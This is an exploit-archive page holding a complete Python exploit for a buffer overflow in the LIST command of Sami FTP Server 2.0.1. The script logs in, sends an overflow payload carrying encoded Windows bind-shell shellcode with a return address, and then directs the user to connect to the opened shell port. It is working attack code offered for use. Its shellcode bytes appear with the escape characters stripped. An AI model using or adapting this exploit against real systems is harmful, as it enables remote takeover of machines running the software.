Home / exploits Sami FTP Server 2.0.1 Buffer Overflow
Posted on 02 March 2013
#!/usr/bin/env python # Exploit Title: Sami FTP LIST buffer overflow # Date: 27 Feb 2013 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.karjasoft.com/old.php # Version: Sami FTP Server 2.0.1 # Tested on: Windows XP Pro SP1, English # Windows XP Pro SP2, English # # Description: # A buffer overflow is triggered when a long LIST command is sent to the # server and the user views the Log tab. # from socket import * import struct, sys IP = sys.argv[1] # Windows bind shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ # Remove bad chars using msfencode: # msfencode -b "x00x0ax0dx2f" -i w32-bind-ngs-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "xd9xc7xbex4dxa5xdex30xd9x74x24xf4x5fx2bxc9" + "xb1x36x31x77x19x03x77x19x83xc7x04xafx50xef" + "xf9x4bx10x61xcax18x50x8exa1x68x81x05xdbx9c" + "x32x67x04x17x72xa0x0bx3fx0ex23xc2x57xc2x9c" + "xd6x95x4ax45x4fxaexf9xe1xd8xdfxf7x69xafx39" + "xb2x89x99x09x94x41x50x76x31xaaxc9x39xefx0c" + "x5fxeex5ex0cxb0x3cxc5x5dxc4x61x39xe9x86x84" + "x39xecxddx3dxf2xcex20xa8x53x3exf1x68xd7x74" + "x64x6dx09xc0xb0xc1xe1x58x95xddx36xeax90x2a" + "x7cx2bx2ex3fxdfxb8x9bx9bxe1x57x14x54xf5xf6" + "xa0xd1xeaxf9x5fx6cxfaxf9x9bxffx50x7dx9dxf6" + "xd3x76x6fx56x18xd4x90xb6x77x4fxeex08x0bx1a" + "x5ex2ax46x1bx70x7fx67x34xe4xfexb7x4bxf8x8f" + "xfbxd9x17xd8x56x48xe7x36x2dxb3x63x4ex1fxe6" + "xdexc6x03x6bxbbx36x49x0fx67x0exfax5bxccxa8" + "xbbx72x12x60xc3xb9x31xdfx99x93x6bx19x5axfb" + "x84xf2x37x51xc2xaex48x03x08xc5xf1x50x39x13" + "x02x57x45" ) # EIP overwritten at offset 218 # JMP ESP at 10028283 C:Program FilesPMSystemTemp mp0.dll (Universal) buf = "A" * 218 + struct.pack("<I", 0x10028283) + "x90" * 37 + shellcode s = socket(AF_INET, SOCK_STREAM) s.connect((IP,21)) print s.recv(1024) s.send("USER superkojiman ") print s.recv(1024) s.send("PASS letmein ") print s.recv(1024) print "[+] sending payload of size", len(buf) s.send("LIST " + buf + " ") print s.recv(1024) s.close() print "[+] sent. Connect to %s on port 28876" % (sys.argv[1],)
